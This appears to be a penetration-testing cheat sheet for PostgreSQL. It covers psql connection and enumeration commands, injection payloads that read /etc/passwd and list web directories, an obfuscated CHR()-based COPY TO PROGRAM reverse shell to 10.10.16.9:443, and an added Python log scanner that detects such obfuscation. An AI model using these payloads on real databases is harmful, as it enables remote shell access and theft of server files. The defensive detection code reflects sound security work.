# PostgreSQL Port (5432)

PostgreSQL is a powerful, open-source object-relational database system. During security assessments, you may encounter PostgreSQL services running on the standard port 5432 or on alternative ports such as 5433.

## How to Connect

### Basic Local Connection

```bash
psql -U <myuser>
```

Opens the psql console with the specified user.

### Remote Connection (Basic)

```bash
psql -h <host> -U <username> -d <database>
```

Connect to a remote PostgreSQL server specifying host, username, and database.

### Remote Connection (Full Parameters)

```bash
psql -h <host> -p <port> -U <username> -W <database>
```

Complete remote connection with all parameters, including a custom port and a password prompt. `-W` forces the prompt and takes no value; the password is typed interactively.

## Enumeration

### List All Databases

```sql
\l
```

This command displays all available databases on the PostgreSQL server.

### Switch to a Database

```sql
\c <database_name>
```

Change the current working database context.

### List Tables in Current Database

```sql
\dt
```

Shows all tables within the currently selected database.

### Extract Data from Specific Table

```sql
SELECT * FROM <table_name>;
```

Retrieve all records from a specified table.

## File System Operations

### Read File

```sql
''; SELECT pg_read_file('/etc/passwd',0,1000);
```

Reads the contents of a file from the server's filesystem. This example reads the first 1000 characters of `/etc/passwd`. By default, only superusers can execute `pg_read_file`.

### List Directory

```sql
''; SELECT pg_ls_dir('/var/www/');
```

Lists the contents of a directory on the server's filesystem. By default, only superusers can execute `pg_ls_dir`.

## Advanced Exploitation

### Reverse Shell WAF Bypass through SQL Injection

```sql
'';DO $reverse$
DECLARE
    s text;
BEGIN
    s := CHR(67)||CHR(79)||CHR(80)||CHR(89)||
         ' (SELECT '''') TO PROGRAM ' ||
         quote_literal('bash -c "bash -i >& /dev/tcp/10.10.16.9/443 0>&1"');
    EXECUTE s;
END $reverse$;
```

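This technique uses PostgreSQL's `COPY ... TO PROGRAM` to run an operating-system command on the database server and establish a reverse shell connection. `COPY ... TO PROGRAM` is available only to superusers and members of the `pg_execute_server_program` role. The payload: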

* Uses `CHR()` functions to obfuscate the "COPY" command
* Executes a bash reverse shell connecting to IP `10.10.16.9` on port `443`
* Bypasses basic WAF filters through string concatenation

**Note:** Remember to replace the IP address and port with your actual listener configuration.

## Security Considerations
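
The `CHR()` concatenation shown above hides the `COPY` keyword from simple pattern matching, so a detection rule has to fold the expression back into a string before matching. The following Python is an added example, not part of the original page: it assumes statements are logged (for example with `log_statement` enabled), and the sample log lines, rule names and function names are constructed for illustration.

```python
import re

# Constructed sample lines in the shape PostgreSQL writes when log_statement
# is enabled; '<command>' is a placeholder, not a real payload.
SAMPLE_LOG = [
    "LOG:  statement: SELECT * FROM users WHERE id = 7;",
    "LOG:  statement: DO $x$ DECLARE s text; BEGIN s := CHR(67)||CHR(79)||"
    "CHR(80)||CHR(89)|| ' (SELECT '''') TO PROGRAM ' || "
    "quote_literal('<command>'); EXECUTE s; END $x$;",
    "LOG:  statement: SELECT pg_read_file('/etc/passwd',0,1000);",
    "LOG:  statement: COPY orders TO STDOUT;",
]

CHR_CALL = re.compile(r"\bchr\s*\(\s*(\d+)\s*\)", re.I)
CONCAT = re.compile(r"'\s*\|\|\s*'")  # the join in 'a' || 'b'
COPY_PROGRAM = re.compile(r"\bcopy\b.*?\b(?:to|from)\s+program\b", re.I | re.S)
FILE_FUNCS = re.compile(
    r"\b(?:pg_read_file|pg_read_binary_file|pg_ls_dir)\s*\(", re.I)

def _chr_to_literal(m):
    n = int(m.group(1))
    # Leave out-of-range code points untouched instead of raising.
    return "'" + chr(n) + "'" if 0 < n <= 0x10FFFF else m.group(0)

def normalize(stmt):
    """Fold CHR(n) calls and || joins into the string they build."""
    return CONCAT.sub("", CHR_CALL.sub(_chr_to_literal, stmt))

def findings(stmt):
    """Return the rule names matched by one logged statement."""
    flat, hits = normalize(stmt), []
    if COPY_PROGRAM.search(flat):
        # Visible only after folding means the keyword was hidden on purpose.
        hits.append("copy-program" if COPY_PROGRAM.search(stmt)
                    else "copy-program-obfuscated")
    if FILE_FUNCS.search(flat):
        hits.append("server-file-access")
    return hits

def scan(lines):
    """Map 1-based line number to findings, for lines with any finding."""
    return {i: f for i, line in enumerate(lines, 1) if (f := findings(line))}

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, hits)
```

A statement that matches only after folding is a stronger signal than a plain `COPY ... PROGRAM`, because legitimate code has no reason to spell the keyword with `CHR()`.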
